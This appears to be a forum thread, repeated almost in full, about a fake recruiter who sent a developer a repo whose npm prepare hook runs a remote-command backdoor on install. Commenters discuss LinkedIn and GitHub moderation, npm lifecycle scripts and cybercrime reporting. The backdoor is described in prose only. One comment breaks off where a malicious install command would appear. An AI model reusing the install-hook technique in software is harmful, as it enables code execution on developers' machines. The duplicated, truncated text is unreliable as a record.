> a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.”
> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.
> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.
> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.
Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
We've had fake recruiters that claim to work for us running basically the same scam. These are great fake profiles: LinkedIn Premium, tons of relevant posts, etc... but they don't work for us, and we get angry messages from people saying our recruiter tried to scam them. No, they're not our recruiter despite showing up on our company page on LinkedIn. No number of reports could get them taken down.
I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn, but not all startups have that connection!
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
I remember getting an office manager, working from Dubai (I think), for my one-person, basically nonexistent company, working from my living room, in New York.
She may still be there. I never bother checking into LI, except making an occasional post, every few months.
I was looking for people who I had worked with at a company that was acquired 15 years ago, and some random person claims to be the CEO of that company.
My last 2 companies, LinkedIn asked me to add an email address associated with the said company and actually confirm via said email in order to add them to my profile. So, if I worked for FooCompany, I had to have a @FooCompany.com email which is set up by someone at the company itself. Does this not cover what you're talking about?
According to my research, LinkedIn only does this for executive and now recruiter-like titles, but not broadly. You may be able to do so in order to get "verified on LinkedIn" but it's not a requirement for showing association with a company.
I'm bottom of the ladder but have seen the option to do it for at least a year.
I have the same. The difference is, if you do email verification, you will get "verified" status. If not, you can still add the company to your LinkedIn, just unverified, which is not a label.
[deleted]
>I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn
I'd like people to understand that this is a form of corruption. We've normalized many like it. LI knows that the only way to force them to fix the issue is to go through a drawn-out legal process, save a spate of bad press (RIP 60 Minutes), so of course they won't.
And I'd like people to understand that, legally, corruption necessarily involves the government. Informally, corruption has been applied to any type of bureaucracy but, even then, an exchange of favors itself isn't corruption, only if an unauthorized deviation from the involved agent's role happens.
Not that relying on this is a good idea.
Bwahaha, no it doesn’t.
Legally ‘corruption’ doesn’t exist, as in there is no single law saying ‘corruption is illegal’. (What is ‘corruption’ exactly?)
There are laws against bribery, which does generally only apply to the government, but in many locations applies to pseudo-government roles like notaries, apostilles, lawyers, etc.
There are laws against embezzlement (a type of corruption), and those definitely apply to private individuals.
There are laws against insider trading, a type of corruption. Those generally only apply to businesses/private folks, not the government, with some exceptions.
Then there are the various kinds of fraud, blackmail, etc. Most people would consider them corruption too. Those apply to private individuals and government agents too.
And many more. It’s a smorgasbord.
[flagged]
LinkedIn doesn't have any redressal mechanisms for anything. Someone I knew went through a lot of abuse by a LI user and kept making new accounts to harass. LinkedIn's response - "We did not find anything that violates our ToC". No wonder it has become a cesspool of spam, fraud and abusers.
Friends don't let friends use NPM. At this point it is so wildly crazy watching people get owned, I don't understand how anyone uses it when they could use e.g. pnpm and block one of the most obvious and frequently exploited holes. These tools with arbitrary code execution when trying to download some code have got to stop.
Edit: typos
Github / Microsoft could easily fix this, couldn't they? Leaving NPM up in its current state seems criminal, especially since LLMs generate NPM commands so frequently.
Is it possible to fix it in a backwards compatible way? Removing lifecycle scripts is at least a semver major change, and would complicate existing projects relying on packages with lifecycle scripts from upgrading.
This is a real world trolley problem scenario. You can break workflows or you can let everyone get pwned by supply chain attacks. Which is the greater harm?
> Friends don't let friends use NPM
or linkedin
I don't have friends, therefore I must use LinkedIn to get a job. Hooray!
>These tools with arbitrary code execution when trying to download some code have got to stop
But you still end up with the code on your machine and risk it being run.
Bigger issue is giant, inscrutable dependency trees.
In this example, if they tried to run the test suite or application, they'd have been in the same boat.
Afaik all or most languages have some way to run arbitrary code at install time but it seems node is the main one getting targeted. I think the bigger issue here is just people running untrusted things.
[deleted]
I agree, but I’d extend that to any language using a package manager at this point. “A little copying is better than a little dependency” even more correct now.
All my current projects have all the code needed in the repo (unless impossible, and aside from a compiler which I guess could also be compromised)
IYKYK
Things like this were a tried and tested method on Upwork, particularly in the 2021-2022 crypto/NFT highs. At some point they branched out from crypto projects and cast a wide net across different categories.
Last I recall was a download of a windows scr (screensaver masquerading) file.
Linkedin is a new low, and I'm sure the platform doesn't really care (look, more jobs), just as ad network companies (Google, Meta) don't really care about scam ads.
I reported a fake Costco website ad (CC harvester) to Google; their response was something along the lines of "we cannot verify the ad", go figure.
I've had people phish for my email then hit that with some bullshitpowershellladendoucument.pdf.docx crap, but sending it directly in the IM?
Bold strategy, Cotton, let's see if it pays off.
I recently went through an interview-o-thon and got a couple obvious scammers. I hope it’s because it’s more prevalent, and not because I seem stupid enough to fall for it!
I haven't been phished like this but I've certainly had fraudsters try to con me into meetings or schemes, etc.
I'm not. I call it identitythiefresourcecenter.com or its shorter name freecriminalresource.com
I hate how normalized it became for "HR" to require you to have a LI page for a job. I don't think it's as bad now, but for a while it was essentially not possible to get a job without putting all your personal info on LinkedIn.
Surprise is unwarranted as LinkedIn enshittifies. This type of thing is exactly what happens when neither the user of the service nor the third-party commercial interests are being served by the commercial enterprise. It's a vacuum that scams enter into.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Github is really slow when it comes to malicious repos. You'll probably get an email randomly six months from now when they finally see it.
So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
Unfortunately most evil cybercriminals know the "one weird trick" of "do your crimes in countries that don't care about the crimes"
I see several comments like this implying nothing can be done. But that is far from the truth. First, an agency that actually answered the phone could coordinate directly with LinkedIn and other tech companies to quickly take down these fake accounts and minimize harm to others. We all know how incredibly hard it is to contact a tech company. Second, an agency that answers the phone could help less technical people find what may have been compromised and push people towards support services if needed. And finally, maybe, they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time.
Taking things down doesn't help much unless the platform has something in place to make it hard to recreate them.
>they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time
At least in the U.S., everyone will cry government overreach and no one will fund it. In other countries, they should probably just ban U.S. platforms unless they're reachable and actually resolve these type of problems.
Won't that require laws that allow the said agency to compel LinkedIn or whatever tech company to actually pay attention and take action? Like laws compelling tech companies to unlock the bootloader once they stop supporting a device.
I wonder why such common sense laws don't exist and who is preventing them from being introduced and passed despite wide public support in general?
I'm not a lawyer but it would be odd if a government agency couldn't communicate a possible threat to a tech company. It is in a company like LinkedIn's best interest to set up a phone number/channels for a centralized agency to communicate potentially malicious accounts and other emerging threats. I suspect that actually already exists for big companies. I doubt they are required to -do- anything without laws but this seems like a win that is easy for all sides. The problem is likely mostly on the US (and other govt) side of things. No clearly defined agency with a clear mandate, resources and leadership to take on this task.
You're describing the FBI or your state level equivalent. And they actually do exactly what you are describing, but in measured efforts. I've even had them come by my place of employment before. They clearly lack the resources to work at this scale though.
The problem with a phone number you suggest is that it will get spammed and abused with fraudulent imposters too (the complete and utter destruction of trust in phone calls and text messages should also be corrected by the government, but that's a different topic).
whilst reducing crime is an honorable objective, as we all know, increasing the wealth of tech billionaires must take priority.
You won't hear back from them, though. But, at least for US citizens (and possibly for anyone?), this is as far as I know the closest thing there is to an "Internet 911".
the main issue is that we lack a global '911'.
secondary is the effort asymmetry between spinning up one of these scams (near 0 effort) and catching/prosecuting these scams (big effort, astronomical cost)
> the main issue is that we lack a global '911'.
911 is for emergencies. I don’t think the global 911 service would give any attention to a LinkedIn scam.
i used the same terminology as the parent, and i think we all know what is meant by it
what about the outcome asymmetry between spinning up one of these scams (get one guy's computer) and getting caught (jail for life)
you arent getting jail for life for this, even in the extremely remote chance you are caught. you are probably getting more than one guy's computer, though.
I’m sure they’ve gotten more than one hot wallet from out of work crypto bros. Probably a profitable venture.
I don’t know but the US kidnaps, ehhh, arrests people on foreign land on a regular basis… and brings them to the US to stand trial. So if it’s “important” enough it will be acted upon…
To put it bluntly and perhaps a bit cynically, on the tree of bad things that people do to other people, this is pretty high-hanging fruit. Right up there next to scam phone calls that prey on the elderly while claiming to be from Microsoft support.
It's basically impossible to catch suspects because they are either smart enough to cover their tracks very well, or (more often) live in countries whose governments don't care about their citizens (even pay them for) scamming westerners.
Hard disagree on the scam phone calls. It would be trivial to eradicate them almost completely if the phone operators did the bare minimum to fight against it. At any point in time, any given US phone number is handled by exactly one phone carrier. There is nothing stopping that carrier from requiring name and address to issue that phone number. They already do for 99.99% of their legitimate customers. It would be very easy to make it so that every single phone call originating from the US, including all VOIP calls made with US phone numbers, can be traced back to a specific business or person that can later be sued or prosecuted.
And no, number spoofing isn't an excuse either. We literally solved the much harder problem of email spoofing already. There are, what, 3 carrier networks in all of US? And they cannot do with each other what DMARC did for the hundreds of thousands disjoint organizations that comprise the internet? Please.
Number spoofing is not a solved problem because some carriers, which appear legitimate in all other respects, make a business out of routing your traffic over TDM trunks that don't support caller ID verification, and will claim it's extremely expensive to upgrade these to VOIP.
Fuck 'em? That's not an insurmountable problem in the slightest. Google or Apple could probably solve this problem themselves by simply not ringing the phone for any call that doesn't meet ID verification.
You are not wrong. They don't do this because they make money from the scammers.
>It would be trivial to eradicate them almost completely
Absolutely true, but droning their data centers might have some policy repercussions.
A majority of people would enthusiastically support drone strikes on scam callers and their infrastructure.
Yeah 100%. It's criminal that this is not already done.
KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure. This is on par with being unable to open a bank account if the capability is matured. I'd advise that you think long and hard about the consequences of this system being applied against you maliciously before signing on the dotted line.
There already are laws that would prevent the exact thing you're talking about. A requirement to provide name and address would change absolutely nothing. And if legal protections are not enough for you then what are we even talking about? Your phone carrier could disable all your lines this instant with a few clicks if they wanted to; the technical capability is already there. They also have your name and address from listening to phone calls and triangulating cell towers - though realistically they didn't need to do it because you already gave them your details knowingly and willingly as part of starting the service, didn't you?
I'd advise that you think long and hard about the consequences of the current system before saying the alternative is worse.
> KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure.
We have that in Europe and the world has not fallen apart. On top of that, we don't have even close to the scale of problems with scammers that the US has. I won't deny we have scammers, because we absolutely have them, but they are far from the scourge they are in the US.
> This is on par with being unable to open a bank account if the capability is matured.
The secret is... we have constitutionally protected rights. Unless you do not pay your bills, your phone line will not get disconnected. And same for bank accounts - every European has the right to a basic banking account, even if you are a target of foreign sanctions [1].
Wonder if they’re effective in going after reports. I’d still report to IC3/FBI/powers that be, too. Just in case someone somewhere has the resources to do something… perhaps a high hope
I get more calls from Google Security than any other thing. Oddly the Pixel's built in scam detection and call screening lets them through without fail. I normally don't have my phone even ring unless it's in my contacts, but saying you are calling from Google is like a magic code.
They must have whitelisted the word Google. Very useful to scammers.
There is, but the FBI is horrible at responding to cybercrime. They have IC3 but it's basically useless. They aren't going to help or even contact you if you report a crime to them.
The scammers are in a whole different uncooperative country.
Or they may be in this country, but use proxies, virtual machines, and hosting from an uncooperative country.
Yes. But the perps are in North Korea.
[flagged]
> simply for being one of the last communist countries
Well, that plus their 50 nuclear warheads and continued ICBM development, amongst other things.
I read the other day they are making quite a turnaround in GDP by selling munitions to our enemies.
[deleted]
Have you seen the state of *gestures at everything*
You mean organized crime like NSO Group? Sorry, governments all over the world are too busy using them to spy on opposition to care.
[deleted]
yes this is a crime.
Cool let's hear your solution, you seem well versed on how infosec works.
This is uncomfortably close to a normal interview task now.
Someone sends you a repo, says the install is broken, and asks you to take a look.
A lot of developers would run npm install before thinking twice, especially if they were tired or looking for work.
The interview context makes it worse. You’re trying not to look slow, so you skip the part where you ask whether you should run it at all.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Oh, Microsoft.
I once saw an ad on LinkedIn made up to look like the CBC (Canadian news) linking to a fake video of the Canadian prime minister announcing a crypto investment plan for all Canadians, with a link to sign up. I reported the ad to LinkedIn and shortly after got a reply telling me they investigated and didn’t find any violation of their policies.
Weird, isn't it? Microsoft owns all of LinkedIn, Github and NPM.
All three either have security or stability issues, which seems to get worse, not better, as microsoft goes more into AI. Where is the AI productivity (10x by some accounts!) within the company going to?
They should have reported it for DMCA violation. It would be gone instantly.
They seem to be using the same domain for multiple targets: reddit thread from 3 months ago:
Why npm is still not blocked by every OS on earth is beyond me. These guys will never learn.
Nothing to do with npm itself. This sort of scam would have worked with many different technologies, even a Makefile.
> So far nothing has changed and the code is still up.
That sucks, but it seems to be par for the course, these days.
Maybe Mac will finally get a decent virtualization framework. Downloading random unprotected scripts from the internet like it is 1995 is getting old pretty fast.
Remember to use protection when meeting random people, and putting their junk deep inside your computer!
>Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.
It's ok, the guy with glasses from the Daily Show said it's ok.
Or running random curl | bash scripts from GitHub, AUR, NPM is just as bad, but many developers here still have dubious assumptions about this bad practice.
The last few weeks tell us how bad this is, especially with all the mini Shai-Huluds running around.
> Maybe Mac will finally get decent virtualization framework.
it already has, you can configure intellij to run npm commands in a Docker container.
I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
My brother had been unemployed for a long time due to illness, and finally got a "job offer" on LinkedIn that seemed legit to him. They asked for him to write a check to make a deposit for his company laptop (which seems pretty insane on the face of it), but he was desperate and really happy to finally have a job offer.
People who've been unemployed for a long time are often desperate enough to overlook serious red flags that would never catch someone with substantial savings or who's employed and looking to job hop.
Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.
Hoisted by their own petard vibes.
This is very likely Lazarus Group - specifically Famous Chollima aka the DPRK
I was a victim of this attack on Friday. The interviewer had a Russian / East European accent.
I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
AFAIK most malware like this first sends the contents of your environment variables, ssh keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want
You can actually test it yourself. The actual URL is in the post and the website is still up.
This has happened to me, it was an attack that was trying to get crypto private keys (ethereum)
Arbitrary remote code execution, maybe sold to the highest bidder like some shady cloud provider?
I only use LinkedIn for the job postings but they’ve become flooded with nonsense the past few months. Lots of postings from Ladders, Swooped, and various companies like those. I think I’m about to ditch LinkedIn permanently.
It’s just so heartwarming to see we are completely indentured to both LinkedIn and GitHub, and forced to curate fake personas and upload our life's work just to secure a paycheck.
Yes, throwaway VPS for interview coding tasks should be the new norm.
It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
Were I still on Linkedin, I could totally have been caught by this. Thank you for this post, and the technical breakdown.
The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.
I feel like there's only going to be more attempts like this, given the state of how many recently made redundant software engineers out there, and the level of desperation to find a job.
Oh my goodness! I had this play out as is on Friday. I luckily got on the Zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.
This has nearly gotten me before, and I got lucky.
I used to get 2-3 shady crypto offers per week on LinkedIn. It stopped when I started replying with AI generated responses demanding multiple verification steps: official email, official offer link, terms and scope etc. And a note with a firm refusal to run any code or install any package on my machine for "recruitment tasks".
LinkedIn is a cesspool of scams now.
They know there's a high degree of fraud and they don't do anything about it. They don't care.
I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.
I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on.
The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
Would highly recommend running any repo in an isolated environment like a vm
With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.
Stay vigilant out there everyone.
> Such people are the worst of the worst of humanity.
I don't know. There's a plentiful supply of bad humans.
Anyone who preys on people who are desperate and hurting are certainly some of the worst though.
Honestly, I would have given up before starting. You spend time and effort on these cases only for the company to say "Unfortunately..."
Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
It would have been game over for me.
I'm working 3 remote jobs right now and I can tell you guys to really watch out.
Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take-home screening project, and they are quite good at getting into engineers' heads that "leetcode is outdated/they don't believe in it" and whatever they want you to hear.
They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.
I am much wiser now that I work multiple salaried jobs remotely; I realize these 3 golden rules:
- Don't stay loyal to your employers.
- Don't stay honest to those who don't value it.
- Don't stay complacent; always innovate.
Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
the entire internet is just phishing at this point
More reasons for me to dislike LinkedIn. I have an account. I hate it.
As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).
They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed):
> a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.”
> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.
> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.
> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.
Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
We've had fake recruiters that claim to work for us running basically the same scam. These are great fake profiles: LinkedIn Premium, tons of relevant posts, etc... but they don't work for us, and we get angry messages from people saying our recruiter tried to scam them. No, they're not our recruiter despite showing up on our company page on LinkedIn. No number of reports could get them taken down.
I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn, but not all startups have that connection!
LinkedIn didn't even disavow people pretending to work for LinkedIn until someone had too much fun with it - https://chrisduffycomedy.com/blog/2016/11/2/6-months-as-the-...
That’s funny, thanks for that.
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
I remember getting an office manager, working from Dubai (I think), for my one-person, basically nonexistent company, working from my living room, in New York.
She may still be there. I never bother checking into LI, except making an occasional post, every few months.
I was looking for people who I had worked with at a company that was acquired 15 years ago, and some random person claims to be the CEO of that company.
My last 2 companies, LinkedIn asked me to add an email address associated with the said company and actually confirm via said email in order to add them to my profile. So, if I worked for FooCompany, I had to have a @FooCompany.com email which is setup by someone at the company itself. Does this not cover what you're talking about?
According to my research, LinkedIn only does this for executive and now recruiter-like titles, but not broadly. You may be able to in order to get "verified on LinkedIn" but it's not a requirement for showing association with a company.
https://www.theverge.com/news/771210/linkedin-recruiter-exec...
I'm bottom of the ladder but have seeing the option to do it for at least a year.
I have the same. The difference is, if you do email verification, you will "verified" status. If not, you can still add the company to your linkedin, just unverified, which is not a label.
>I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn
I'd like people to understand that this is a form of corruption. We've normalized many like it. LI knows that the only way to force them to fix the issue is to go through a drawn-out legal process, save a spate of bad press (RIP 60 Minutes), so of course they won't.
And I'd like people to understand that, legally, corruption necessarily envolves the government. Informally, corruption has been applied to any type of bureaucracy but, even then, an exchange of favors itself isn't corruption, only if an unauthorized deviation from the involved agent's role happens.
Not that relying on this is a good idea.
Bwahaha, no it doesn’t.
Legally ‘corruption’ doesn’t exist, as in there is no single law saying ‘corruption is illegal’. (What is ‘corruption’ exactly?)
There are laws against bribery, which does generally only apply to the government, but in many locations applies to pseudo-government roles like notaries, apostiloes, lawyers, etc.
There are laws against embezzlement (a type of corruption), and those definitely apply to private individuals.
There are laws against insider trading, a type of corruption. Those generally only apply to businesses/private folks, not the government, with some exceptions.
Then there are the various kinds of fraud, blackmail, etc. Most people would consider them corruption too. Those apply to private individuals and government agents too.
And many more. It’s a smorgasbord.
LinkedIn doesn't have any redressal mechanisms for anything. Someone I knew went through a lot of abuse by a LI user and kept making new accounts to harass. LinkedIn's response - "We did not find anything that violates our ToC". No wonder it has become a cesspool of spam, fraud and abusers.
Friends don't let friends use NPM. At this point it is so wildly crazy watching people get owned, I don't understand how anyone uses it when they could use e.g. pnpm and block one of the most obvious and frequently exploited holes. These tools with arbitrary code execution when trying to download some code have got to stop.
Edit: typos
Github / Microsoft could easily fix this, couldn't they? Leaving NPM up in its current state seems criminal, especially since LLMs generate NPM commands so frequently.
They have some changes here in v12: https://github.blog/changelog/2026-06-09-upcoming-breaking-c...
Is it possible to fix it in a backwards compatible way? Removing lifecycle scripts is at least a semver major change, and would complicate existing projects relying on packages with lifecycle scripts from upgrading.
This is a real world trolley problem scenario. You can break workflows or you can let everyone get pwned by supply chain attacks. Which is the greater harm?
> Friends don't let friends use NPM
or linkedin
I don't have friends, therefore I must use LinkedIn to get a job. Hooray!
> These tools with arbitrary code execution when trying to download some code have got to stop
But you still end up with the code on your machine and risk it being run.
Bigger issue is giant, inscrutable dependency trees.
In this example, if they tried to run the test suite or application, they'd have been in the same boat.
Afaik all or most languages have some way to run arbitrary code at install time but it seems node is the main one getting targeted. I think the bigger issue here is just people running untrusted things.
I agree, but I’d extend that to any language using a package manager at this point. “A little copying is better than a little dependency” even more correct now.
All my current projects have all the code needed in the repo (unless impossible, and aside from a compiler which I guess could also be compromised)
IYKYK
Things like this were a tried and tested method on Upwork, particularly in the 2021-2022 crypto/nft highs. At some point they branched out from crypto projects and cast a wide net across different categories.
Last I recall was a download of a windows scr (screensaver masquerading) file.
Linkedin is a new low, and I'm sure the platform doesn't really care (look, more jobs), just as ad network companies (Google, Meta) don't really care about scam ads.
I reported a fake costco website ad (cc harvester) to Google, their response was something along "we cannot verify the ad", go figure
I've had people phish for my email then hit that with some bullshitpowershellladendoucument.pdf.docx crap, but sending it directly in the IM?
Bold strategy cotton, let's see if it pays off.
I recently went through an interview-o-thon and got a couple obvious scammers. I hope it’s because it’s more prevalent, and not because I seem stupid enough to fall for it!
I haven't been phished like this but I've certainly had fraudsters try to con me into meetings or schemes, etc.
I'm not. I call it identitythiefresourcecenter.com or its shorter name freecriminalresource.com
I hate how normalized it became for "HR" to require you having a LI page for a job. I don't think it's as bad now but for a while it was essentially not possible to get a job without putting all your personal info on LinkedIn.
Surprise is unwarranted as LinkedIn enshittifies. This type of thing is exactly what happens when neither the user of the service, nor the third party commercial interests are being served by the commercial enterprise. It's a vacuum that scams enter into.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Github is really slow when it comes to malicious repos. You'll probably get an email randomly six months from now when they finally see it.
So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
Unfortunately most evil cybercriminals know the "one weird trick" of "do your crimes in countries that don't care about the crimes"
I see several comments like this implying nothing can be done. But that is far from the truth. First, an agency that actually answered the phone could coordinate directly with LinkedIn and other tech companies to quickly take down these fake accounts and minimize harm to others. We all know how incredibly hard it is to contact a tech company. Second, an agency that answers the phone could help less technical people find what may have been compromised and push people towards support services if needed. And finally, maybe, they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time.
Taking things down doesn't help much unless the platform has something in place to make it hard to recreate them.
> they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time
At least in the U.S., everyone will cry government overreach and no one will fund it. In other countries, they should probably just ban U.S. platforms unless they're reachable and actually resolve these types of problems.
Won't that require laws that allow the said agency to compel LinkedIn or whatever tech company to actually pay attention and take action? Like laws compelling tech companies to unlock the bootloader once they stop supporting a device.
I wonder why such common sense laws don't exist and who is preventing them from being introduced and passed despite wide public support in general?
I'm not a lawyer but it would be odd if a government agency couldn't communicate a possible threat to a tech company. It is in a company like LinkedIn's best interest to set up a phone number/channels for a centralized agency to communicate potentially malicious accounts and other emerging threats. I suspect that actually already exists for big companies. I doubt they are required to -do- anything without laws but this seems like a win that is easy for all sides. The problem is likely mostly on the US (and other govt) side of things. No clearly defined agency with a clear mandate, resources and leadership to take on this task.
You're describing the FBI or your state level equivalent. And they actually do exactly what you are describing, but in measured efforts. I've even had them come by my place of employment before. They clearly lack the resources to work at this scale though.
The problem with a phone number you suggest is that it will get spammed and abused with fraudulent imposters too (the complete and utter destruction of trust in phone calls and text messages should also be corrected by the government, but that's a different topic).
Whilst reducing crime is an honorable objective, as we all know, increasing the wealth of tech billionaires must take priority.
https://www.ic3.gov
You won't hear back from them, though. But, at least for US citizens (and possibly for anyone?), this is as far as I know the closest thing there is to an "Internet 911".
the main issue is that we lack a global '911'.
secondary is the effort asymmetry between spinning up one of these scams (near 0 effort) and catching/prosecuting these scams (big effort, astronomical cost)
> the main issue is that we lack a global '911'.
911 is for emergencies. I don’t think the global 911 service would give any attention to a LinkedIn scam.
i used the same terminology as the parent, and i think we all know what is meant by it
what about the outcome asymmetry between spinning up one of these scams (get one guy's computer) and getting caught (jail for life)
you aren't getting jail for life for this, even in the extremely remote chance you are caught. you are probably getting more than one guy's computer, though.
I’m sure they’ve gotten more than one hot wallet from out of work crypto bros. Probably a profitable venture.
I don’t know, but the US kidnaps, ehhh, arrests people on foreign land on a regular basis… and brings them to the US to stand trial. So if it’s “important” enough it will be acted upon…
To put it bluntly and perhaps a bit cynically, on the tree of bad things that people do to other people, this is pretty high-hanging fruit. Right up there next to scam phone calls that prey on the elderly while claiming to be from Microsoft support.
It's basically impossible to catch suspects because they are either smart enough to cover their tracks very well, or (more often) live in countries whose governments don't care about their citizens (even pay them for) scamming westerners.
Hard disagree on the scam phone calls. It would be trivial to eradicate them almost completely if the phone operators did the bare minimum to fight against it. At any point in time, any given US phone number is handled by exactly one phone carrier. There is nothing stopping that carrier from requiring name and address to issue that phone number. They already do for 99.99% of their legitimate customers. It would be very easy to make it so that every single phone call originating from the US, including all VOIP calls made with US phone numbers, can be traced back to a specific business or person that can later be sued or prosecuted.
And no, number spoofing isn't an excuse either. We literally solved the much harder problem of email spoofing already. There are, what, 3 carrier networks in all of the US? And they cannot do with each other what DMARC did for the hundreds of thousands of disjoint organizations that comprise the internet? Please.
Number spoofing is not a solved problem because some carriers, which appear legitimate in all other respects, make a business out of routing your traffic over TDM trunks that don't support caller ID verification, and will claim it's extremely expensive to upgrade these to VOIP.
Fuck 'em? That's not an insurmountable problem in the slightest. Google or Apple could probably solve this problem themselves by simply not ringing the phone for any call that doesn't meet ID verification.
You are not wrong. They don't do this because they make money from the scammers.
I have posted about this before. See here: https://news.ycombinator.com/item?id=35191971
> It would be trivial to eradicate them almost completely
Absolutely true, but droning their data centers might have some policy repercussions.
A majority of people would enthusiastically support drone strikes on scam callers and their infrastructure.
Yeah 100%. It's criminal that this is not already done.
KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure. This is on par with being unable to open a bank account if the capability is matured. I'd advise that you think long and hard about the consequences of this system being applied against you maliciously before signing on the dotted line.
There already are laws that would prevent the exact thing you're talking about. A requirement to provide name and address would change absolutely nothing. And if legal protections are not enough for you then what are we even talking about? Your phone carrier could disable all your lines this instant with a few clicks if they wanted to; the technical capability is already there. They also have your name and address from listening to phone calls and triangulating cell towers - though realistically they didn't need to do it because you already gave them your details knowingly and willingly as part of starting the service, didn't you?
I'd advise that you think long and hard about the consequences of the current system before saying the alternative is worse.
> KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure.
We have that in Europe and the world has not fallen apart. On top of that, we don't have even close to the scale of problems with scammers that the US has. I won't deny we don't have scammers because we absolutely have them, but they are far from the scourge they are in the US.
> This is on par with being unable to open a bank account if the capability is matured.
The secret is... we have constitutionally protected rights. Unless you do not pay your bills, your phone line will not get disconnected. And same for bank accounts - every European has the right to a basic banking account, even if you are a target of foreign sanctions [1].
[1] https://www.tagesschau.de/ausland/europa/konto-eugh-usa-sank...
Saw Microsoft has a dedicated scam reporting page - guess it was damaging their brand https://reportfraud.microsoft.com/en-us
Wonder if they’re effective in going after reports. I’d still report to IC3/FBI/powers that be, too. Just in case someone somewhere has the resources to do something… perhaps a high hope
I get more calls from Google Security than any other thing. Oddly the Pixel's built in scam detection and call screening lets them through without fail. I normally don't have my phone even ring unless it's in my contacts, but saying you are calling from Google is like a magic code.
They must have whitelisted the word Google. Very useful to scammers.
There is, but the FBI is horrible at responding to cybercrime. They have IC3 but it's basically useless. They aren't going to help or even contact you if you report a crime to them.
The scammers are in a whole different uncooperative country.
Or they may be in this country, but use proxies, virtual machines, and hosting from an uncooperative country.
Yes. But the perps are in North Korea.
> simply for being one of the last communist countries
Well, that plus their 50 nuclear warheads and continued ICBM development, amongst other things.
I read the other day they are making quite a turnaround in GDP by selling munitions to our enemies.
Have you seen the state of *gestures at everything*
You mean organized crime like NSO Group? Sorry, governments all over the world are too busy using them to spy on opposition to care.
yes this is a crime.
Cool let's hear your solution, you seem well versed on how infosec works.
This is uncomfortably close to a normal interview task now.
Someone sends you a repo, says the install is broken, and asks you to take a look.
A lot of developers would run npm install before thinking twice, especially if they were tired or looking for work.
The interview context makes it worse. You’re trying not to look slow, so you skip the part where you ask whether you should run it at all.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Oh, Microsoft.
